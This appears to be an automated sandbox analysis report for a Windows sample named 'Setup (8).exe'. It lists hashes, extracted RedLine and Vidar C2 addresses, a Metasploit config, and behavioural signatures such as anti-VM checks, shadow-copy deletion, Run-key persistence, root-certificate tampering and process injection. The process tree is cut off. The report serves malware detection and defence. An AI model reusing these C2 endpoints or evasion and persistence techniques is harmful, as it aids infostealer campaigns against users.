Overview
overview
10Static
static
Setup (1).exe
windows10_x64
10Setup (10).exe
windows10_x64
10Setup (11).exe
windows10_x64
10Setup (12).exe
windows10_x64
10Setup (13).exe
windows10_x64
10Setup (14).exe
windows10_x64
10Setup (15).exe
windows10_x64
10Setup (16).exe
windows10_x64
10Setup (17).exe
windows10_x64
10Setup (18).exe
windows10_x64
10Setup (19).exe
windows10_x64
10Setup (2).exe
windows10_x64
10Setup (20).exe
windows10_x64
10Setup (21).exe
windows10_x64
10Setup (22).exe
windows10_x64
10Setup (23).exe
windows10_x64
10Setup (24).exe
windows10_x64
10Setup (25).exe
windows10_x64
10Setup (26).exe
windows10_x64
10Setup (27).exe
windows10_x64
10Setup (28).exe
windows10_x64
10Setup (29).exe
windows10_x64
10Setup (3).exe
windows10_x64
10Setup (30).exe
windows10_x64
10Setup (31).exe
windows10_x64
10Setup (4).exe
windows10_x64
10Setup (5).exe
windows10_x64
10Setup (6).exe
windows10_x64
10Setup (7).exe
windows10_x64
10Setup (8).exe
windows10_x64
10Setup (9).exe
windows10_x64
10Setup.exe
windows10_x64
10Resubmissions
15/10/2024, 15:36
241015-s1zlzasdkc 1001/07/2024, 18:32
240701-w6yteawhmq 1001/07/2024, 14:52
240701-r82wmaxdnd 1001/07/2024, 14:52
240701-r8syqa1dpp 1011/03/2024, 21:22
240311-z8dsssgg58 1001/09/2021, 13:18
210901-5bmxjspa5s 1001/09/2021, 13:04
210901-te4btfspqa 1001/09/2021, 05:12
210901-4wnkwm1p3j 1031/08/2021, 21:47
210831-41rp97dma2 10Analysis
-
max time kernel
171s -
max time network
1615s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
24/08/2021, 20:54
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win10v20210410
Behavioral task
behavioral2
Sample
Setup (10).exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
Setup (11).exe
Resource
win10v20210408
Behavioral task
behavioral4
Sample
Setup (12).exe
Resource
win10v20210410
Behavioral task
behavioral5
Sample
Setup (13).exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
Setup (14).exe
Resource
win10v20210410
Behavioral task
behavioral7
Sample
Setup (15).exe
Resource
win10v20210410
Behavioral task
behavioral8
Sample
Setup (16).exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
Setup (17).exe
Resource
win10v20210410
Behavioral task
behavioral10
Sample
Setup (18).exe
Resource
win10v20210408
Behavioral task
behavioral11
Sample
Setup (19).exe
Resource
win10v20210410
Behavioral task
behavioral12
Sample
Setup (2).exe
Resource
win10v20210408
Behavioral task
behavioral13
Sample
Setup (20).exe
Resource
win10v20210410
Behavioral task
behavioral14
Sample
Setup (21).exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
Setup (22).exe
Resource
win10v20210408
Behavioral task
behavioral16
Sample
Setup (23).exe
Resource
win10v20210410
Behavioral task
behavioral17
Sample
Setup (24).exe
Resource
win10v20210408
Behavioral task
behavioral18
Sample
Setup (25).exe
Resource
win10v20210410
Behavioral task
behavioral19
Sample
Setup (26).exe
Resource
win10v20210408
Behavioral task
behavioral20
Sample
Setup (27).exe
Resource
win10v20210410
Behavioral task
behavioral21
Sample
Setup (28).exe
Resource
win10v20210410
Behavioral task
behavioral22
Sample
Setup (29).exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
Setup (3).exe
Resource
win10v20210410
Behavioral task
behavioral24
Sample
Setup (30).exe
Resource
win10v20210408
Behavioral task
behavioral25
Sample
Setup (31).exe
Resource
win10v20210410
Behavioral task
behavioral26
Sample
Setup (4).exe
Resource
win10v20210408
Behavioral task
behavioral27
Sample
Setup (5).exe
Resource
win10v20210410
Behavioral task
behavioral28
Sample
Setup (6).exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
Setup (7).exe
Resource
win10v20210408
Behavioral task
behavioral30
Sample
Setup (8).exe
Resource
win10v20210410
Behavioral task
behavioral31
Sample
Setup (9).exe
Resource
win10v20210408
Behavioral task
behavioral32
Sample
Setup.exe
Resource
win10v20210410
General
-
Target
Setup (8).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
redline
supertraff
135.148.139.222:1494
Extracted
redline
dibild2
135.148.139.222:1494
Extracted
redline
v2
195.2.78.163:25450
Extracted
metasploit
windows/single_exec
Extracted
vidar
40.1
937
https://eduarroma.tumblr.com/
-
profile_id
937
Signatures
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral30/memory/2732-388-0x00000000051F0000-0x0000000005B16000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6980 188 rundll32.exe 134 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8676 188 rundll32.exe 134 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 684 188 rundll32.exe 134 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3540 188 rundll32.exe 134 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
resource yara_rule behavioral30/files/0x000100000001abac-134.dat family_redline behavioral30/files/0x000100000001abac-196.dat family_redline behavioral30/memory/1964-280-0x000000000041A616-mapping.dmp family_redline behavioral30/memory/1964-277-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral30/memory/4296-275-0x0000000000FA0000-0x0000000000FBB000-memory.dmp family_redline behavioral30/memory/4912-314-0x000000000041A76A-mapping.dmp family_redline behavioral30/memory/5240-521-0x000000000041A61A-mapping.dmp family_redline -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral30/memory/1904-376-0x0000000002E50000-0x0000000002F9A000-memory.dmp family_vidar behavioral30/memory/1904-396-0x0000000000400000-0x0000000002D1A000-memory.dmp family_vidar -
Blocklisted process makes network request 5 IoCs
flow pid Process 149 4228 cmd.exe 152 4584 cmd.exe 155 4228 cmd.exe 156 4228 cmd.exe 158 4584 cmd.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 41 IoCs
pid Process 804 DBquM9Ux3O2P6QTSM7bEyIJg.exe 512 tDNpWE8Ffr9I95g5rfOORzaj.exe 420 xuPTrPhG8LiTCCYkRU3l5dJn.exe 652 0ZvtfMMtmei_r2LUhzD6s3nl.exe 856 tdLynNSjWDwoYV_NtVV9prtL.exe 4340 RAGsMRiGvQfHKGxdA_XdEHZ4.exe 4256 tFAiejrvGkLA09uKG9VYjzE9.exe 4296 3IjmjaZKIJmptGbbtw1_D26A.exe 296 hqhJ93v2Sp2le8a1_PJ6h24Z.exe 508 gjBZerm3X6OG0IODIHvioyga.exe 1028 TjiAcqevqaAuG8f2vw40KD72.exe 580 PegYFqmYOCQQpBeo47YBAEF5.exe 4228 KxuucbJ_95kucQ9ETFrE7iPJ.exe 1904 4RzU7BiBxmLwffxRvpEDiZSm.exe 1812 AK8bFJ2kMHwvSgaE68geOqWe.exe 2200 ch4sEc_fJpwjttkGs9QqTu4a.exe 2732 7XRd6tmNRnvpvvsD9uVr8_2e.exe 4416 XeZ3UVKJj0F8nD1ajWBiOWIQ.exe 4420 RP11pnadhhUPl610oidJj8MQ.exe 744 Dz6v9cEoKfJYRw032bIvHe6r.exe 3136 gd6uGJvHfRYMrGagBQn0wl2K.exe 3860 VO49JLlC8_Np40dUNpo8MwXg.exe 972 AOrVfqejFU4lQIMMYFfynLWS.exe 3836 taskkill.exe 3796 Eug40X9J7YAE5ZHuGHmAbQnS.exe 4584 cmd.exe 4528 oeAHcI58P5hXFE5b9fwcXmMF.exe 3752 jooyu.exe 4136 Eug40X9J7YAE5ZHuGHmAbQnS.tmp 3192 DBquM9Ux3O2P6QTSM7bEyIJg.exe 1964 xuPTrPhG8LiTCCYkRU3l5dJn.exe 3912 cmd.exe 4912 DBquM9Ux3O2P6QTSM7bEyIJg.exe 3152 AK8bFJ2kMHwvSgaE68geOqWe.exe 4672 2305080.exe 804 3814353.exe 4040 7330230.exe 3756 2732743.exe 2812 WO~L~OYJWS8EVL1.eXe 1128 WinHoster.exe 2616 tdLynNSjWDwoYV_NtVV9prtL.exe -
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TjiAcqevqaAuG8f2vw40KD72.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion PegYFqmYOCQQpBeo47YBAEF5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion PegYFqmYOCQQpBeo47YBAEF5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion gd6uGJvHfRYMrGagBQn0wl2K.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion gd6uGJvHfRYMrGagBQn0wl2K.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RAGsMRiGvQfHKGxdA_XdEHZ4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RAGsMRiGvQfHKGxdA_XdEHZ4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TjiAcqevqaAuG8f2vw40KD72.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Setup (8).exe -
Loads dropped DLL 3 IoCs
pid Process 4296 3IjmjaZKIJmptGbbtw1_D26A.exe 4136 Eug40X9J7YAE5ZHuGHmAbQnS.tmp 4136 Eug40X9J7YAE5ZHuGHmAbQnS.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral30/files/0x000100000001abbe-146.dat themida behavioral30/files/0x000100000001abbd-147.dat themida behavioral30/files/0x000100000001abb1-137.dat themida behavioral30/files/0x000100000001abb1-181.dat themida behavioral30/files/0x000100000001abbe-180.dat themida behavioral30/files/0x000100000001abbd-199.dat themida behavioral30/files/0x000100000001abd5-203.dat themida behavioral30/files/0x000100000001abd5-174.dat themida behavioral30/memory/4340-254-0x0000000000B20000-0x0000000000B21000-memory.dmp themida behavioral30/memory/1028-260-0x0000000001130000-0x0000000001131000-memory.dmp themida behavioral30/memory/3136-265-0x0000000000BE0000-0x0000000000BE1000-memory.dmp themida behavioral30/memory/580-266-0x00000000009A0000-0x00000000009A1000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 3814353.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA TjiAcqevqaAuG8f2vw40KD72.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA PegYFqmYOCQQpBeo47YBAEF5.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA gd6uGJvHfRYMrGagBQn0wl2K.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RAGsMRiGvQfHKGxdA_XdEHZ4.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 19 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 590 geoiptool.com 622 freegeoip.app 30 ipinfo.io 312 ipinfo.io 159 ipinfo.io 201 freegeoip.app 220 freegeoip.app 29 ipinfo.io 150 ip-api.com 369 ipinfo.io 371 ipinfo.io 623 freegeoip.app 207 freegeoip.app 221 ipinfo.io 222 ipinfo.io 310 ipinfo.io 311 ipinfo.io 161 ipinfo.io 204 freegeoip.app -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 4340 RAGsMRiGvQfHKGxdA_XdEHZ4.exe 1028 TjiAcqevqaAuG8f2vw40KD72.exe 580 PegYFqmYOCQQpBeo47YBAEF5.exe 3136 gd6uGJvHfRYMrGagBQn0wl2K.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 420 set thread context of 1964 420 xuPTrPhG8LiTCCYkRU3l5dJn.exe 116 PID 804 set thread context of 4912 804 3814353.exe 121 PID 856 set thread context of 2616 856 tdLynNSjWDwoYV_NtVV9prtL.exe 139 -
Drops file in Program Files directory 5 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe RP11pnadhhUPl610oidJj8MQ.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe RP11pnadhhUPl610oidJj8MQ.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe RP11pnadhhUPl610oidJj8MQ.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe RP11pnadhhUPl610oidJj8MQ.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini RP11pnadhhUPl610oidJj8MQ.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 60 IoCs
pid pid_target Process procid_target 8 3860 WerFault.exe 108 4708 3860 WerFault.exe 108 304 3860 WerFault.exe 108 4392 3860 WerFault.exe 108 5548 1904 WerFault.exe 93 5784 2732 WerFault.exe 101 5840 1904 WerFault.exe 93 5964 2732 WerFault.exe 101 5972 1904 WerFault.exe 93 6020 3860 WerFault.exe 108 1300 1904 WerFault.exe 93 5156 2732 WerFault.exe 101 5404 1904 WerFault.exe 93 4332 2732 WerFault.exe 101 5552 1904 WerFault.exe 93 3312 2732 WerFault.exe 101 3124 1904 WerFault.exe 93 5704 1904 WerFault.exe 93 5572 2732 WerFault.exe 101 5704 1904 WerFault.exe 93 6596 2732 WerFault.exe 101 6812 1904 WerFault.exe 93 6152 2732 WerFault.exe 101 1544 5356 WerFault.exe 160 6492 1904 WerFault.exe 93 7344 5356 WerFault.exe 160 7632 6568 WerFault.exe 209 7328 1904 WerFault.exe 93 7572 6568 WerFault.exe 209 7096 5356 WerFault.exe 160 6260 6568 WerFault.exe 209 7792 5356 WerFault.exe 160 7088 6568 WerFault.exe 209 7432 5356 WerFault.exe 160 7608 5356 WerFault.exe 160 6804 5356 WerFault.exe 160 6036 7060 WerFault.exe 220 6784 5356 WerFault.exe 160 6652 7060 WerFault.exe 220 6416 7108 WerFault.exe 221 6300 7060 WerFault.exe 220 6132 7060 WerFault.exe 220 6804 7108 WerFault.exe 221 8288 8080 WerFault.exe 272 8464 7108 WerFault.exe 221 8588 7060 WerFault.exe 220 8632 8080 WerFault.exe 272 8824 8080 WerFault.exe 272 8880 7108 WerFault.exe 221 9108 5356 WerFault.exe 160 9200 7108 WerFault.exe 221 6464 7108 WerFault.exe 221 8516 5356 WerFault.exe 160 8644 7108 WerFault.exe 221 8588 7108 WerFault.exe 221 8824 7060 WerFault.exe 220 6864 8080 WerFault.exe 272 6096 5356 WerFault.exe 160 2288 5356 WerFault.exe 160 8716 7060 WerFault.exe 220 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI PBrowFile15.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI PBrowFile15.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI PBrowFile15.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6528 schtasks.exe 9760 schtasks.exe 6660 schtasks.exe 5660 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 11224 vssadmin.exe 9680 vssadmin.exe -
Kills process with taskkill 8 IoCs
pid Process 3836 taskkill.exe 5048 taskkill.exe 6624 taskkill.exe 10236 taskkill.exe 8424 taskkill.exe 5228 taskkill.exe 5432 taskkill.exe 5536 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Setup (8).exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Setup (8).exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 9476 PING.EXE 10400 PING.EXE 2044 PING.EXE -
Script User-Agent 8 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 161 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 166 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 301 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 302 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 303 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 370 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 372 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 160 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4448 Setup (8).exe 4448 Setup (8).exe 8 WerFault.exe 8 WerFault.exe 8 WerFault.exe 8 WerFault.exe 8 WerFault.exe 8 WerFault.exe 8 WerFault.exe 8 WerFault.exe 8 WerFault.exe 8 WerFault.exe 8 WerFault.exe 8 WerFault.exe 8 WerFault.exe 8 WerFault.exe 8 WerFault.exe 8 WerFault.exe 8 WerFault.exe 8 WerFault.exe 8 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 4708 WerFault.exe 304 WerFault.exe 304 WerFault.exe 304 WerFault.exe 304 WerFault.exe 304 WerFault.exe 304 WerFault.exe 304 WerFault.exe 304 WerFault.exe 304 WerFault.exe 304 WerFault.exe 304 WerFault.exe 304 WerFault.exe 304 WerFault.exe 304 WerFault.exe 304 WerFault.exe 304 WerFault.exe 304 WerFault.exe 304 WerFault.exe 304 WerFault.exe 304 WerFault.exe 4256 PBrowFile15.exe 4256 PBrowFile15.exe 4392 WerFault.exe 4392 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 4296 3IjmjaZKIJmptGbbtw1_D26A.exe Token: SeDebugPrivilege 296 hqhJ93v2Sp2le8a1_PJ6h24Z.exe Token: SeDebugPrivilege 4228 cmd.exe Token: SeRestorePrivilege 8 WerFault.exe Token: SeBackupPrivilege 8 WerFault.exe Token: SeDebugPrivilege 8 WerFault.exe Token: SeDebugPrivilege 4340 RAGsMRiGvQfHKGxdA_XdEHZ4.exe Token: SeDebugPrivilege 4708 WerFault.exe Token: SeDebugPrivilege 4912 DBquM9Ux3O2P6QTSM7bEyIJg.exe Token: SeDebugPrivilege 652 0ZvtfMMtmei_r2LUhzD6s3nl.exe Token: SeDebugPrivilege 1964 xuPTrPhG8LiTCCYkRU3l5dJn.exe Token: SeDebugPrivilege 1028 TjiAcqevqaAuG8f2vw40KD72.exe Token: SeDebugPrivilege 3136 gd6uGJvHfRYMrGagBQn0wl2K.exe Token: SeDebugPrivilege 580 PegYFqmYOCQQpBeo47YBAEF5.exe Token: SeDebugPrivilege 4672 2305080.exe Token: SeDebugPrivilege 304 WerFault.exe Token: SeDebugPrivilege 3756 2732743.exe Token: SeDebugPrivilege 4392 WerFault.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4136 Eug40X9J7YAE5ZHuGHmAbQnS.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4448 wrote to memory of 420 4448 Setup (8).exe 88 PID 4448 wrote to memory of 420 4448 Setup (8).exe 88 PID 4448 wrote to memory of 420 4448 Setup (8).exe 88 PID 4448 wrote to memory of 512 4448 Setup (8).exe 87 PID 4448 wrote to memory of 512 4448 Setup (8).exe 87 PID 4448 wrote to memory of 512 4448 Setup (8).exe 87 PID 4448 wrote to memory of 804 4448 Setup (8).exe 82 PID 4448 wrote to memory of 804 4448 Setup (8).exe 82 PID 4448 wrote to memory of 804 4448 Setup (8).exe 82 PID 4448 wrote to memory of 4340 4448 Setup (8).exe 83 PID 4448 wrote to memory of 4340 4448 Setup (8).exe 83 PID 4448 wrote to memory of 4340 4448 Setup (8).exe 83 PID 4448 wrote to memory of 652 4448 Setup (8).exe 84 PID 4448 wrote to memory of 652 4448 Setup (8).exe 84 PID 4448 wrote to memory of 652 4448 Setup (8).exe 84 PID 4448 wrote to memory of 856 4448 Setup (8).exe 81 PID 4448 wrote to memory of 856 4448 Setup (8).exe 81 PID 4448 wrote to memory of 856 4448 Setup (8).exe 81 PID 4448 wrote to memory of 508 4448 Setup (8).exe 86 PID 4448 wrote to memory of 508 4448 Setup (8).exe 86 PID 4448 wrote to memory of 296 4448 Setup (8).exe 80 PID 4448 wrote to memory of 296 4448 Setup (8).exe 80 PID 4448 wrote to memory of 296 4448 Setup (8).exe 80 PID 4448 wrote to memory of 4256 4448 Setup (8).exe 90 PID 4448 wrote to memory of 4256 4448 Setup (8).exe 90 PID 4448 wrote to memory of 4256 4448 Setup (8).exe 90 PID 4448 wrote to memory of 4296 4448 Setup (8).exe 89 PID 4448 wrote to memory of 4296 4448 Setup (8).exe 89 PID 4448 wrote to memory of 4228 4448 Setup (8).exe 91 PID 4448 wrote to memory of 4228 4448 Setup (8).exe 91 PID 4448 wrote to memory of 580 4448 Setup (8).exe 85 PID 4448 wrote to memory of 580 4448 Setup (8).exe 85 PID 4448 wrote to memory of 580 4448 Setup (8).exe 85 PID 4448 wrote to memory of 1028 4448 Setup (8).exe 79 PID 4448 wrote to memory of 1028 4448 Setup (8).exe 79 PID 4448 wrote to memory of 1028 4448 Setup (8).exe 79 PID 4448 wrote to memory of 1904 4448 Setup (8).exe 93 PID 4448 wrote to memory of 1904 4448 Setup (8).exe 93 PID 4448 wrote to memory of 1904 4448 Setup (8).exe 93 PID 4448 wrote to memory of 1812 4448 Setup (8).exe 92 PID 4448 wrote to memory of 1812 4448 Setup (8).exe 92 PID 4448 wrote to memory of 1812 4448 Setup (8).exe 92 PID 4448 wrote to memory of 2200 4448 Setup (8).exe 102 PID 4448 wrote to memory of 2200 4448 Setup (8).exe 102 PID 4448 wrote to memory of 2200 4448 Setup (8).exe 102 PID 4448 wrote to memory of 2732 4448 Setup (8).exe 101 PID 4448 wrote to memory of 2732 4448 Setup (8).exe 101 PID 4448 wrote to memory of 2732 4448 Setup (8).exe 101 PID 4448 wrote to memory of 4416 4448 Setup (8).exe 106 PID 4448 wrote to memory of 4416 4448 Setup (8).exe 106 PID 4448 wrote to memory of 4416 4448 Setup (8).exe 106 PID 4448 wrote to memory of 4420 4448 Setup (8).exe 105 PID 4448 wrote to memory of 4420 4448 Setup (8).exe 105 PID 4448 wrote to memory of 4420 4448 Setup (8).exe 105 PID 4448 wrote to memory of 744 4448 Setup (8).exe 104 PID 4448 wrote to memory of 744 4448 Setup (8).exe 104 PID 4448 wrote to memory of 744 4448 Setup (8).exe 104 PID 4448 wrote to memory of 3136 4448 Setup (8).exe 109 PID 4448 wrote to memory of 3136 4448 Setup (8).exe 109 PID 4448 wrote to memory of 3136 4448 Setup (8).exe 109 PID 4448 wrote to memory of 3860 4448 Setup (8).exe 108 PID 4448 wrote to memory of 3860 4448 Setup (8).exe 108 PID 4448 wrote to memory of 3860 4448 Setup (8).exe 108 PID 4448 wrote to memory of 972 4448 Setup (8).exe 123
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (8).exe"C:\Users\Admin\AppData\Local\Temp\Setup (8).exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Users\Admin\Documents\TjiAcqevqaAuG8f2vw40KD72.exe"C:\Users\Admin\Documents\TjiAcqevqaAuG8f2vw40KD72.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
-
C:\Users\Admin\Documents\hqhJ93v2Sp2le8a1_PJ6h24Z.exe"C:\Users\Admin\Documents\hqhJ93v2Sp2le8a1_PJ6h24Z.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:296 -
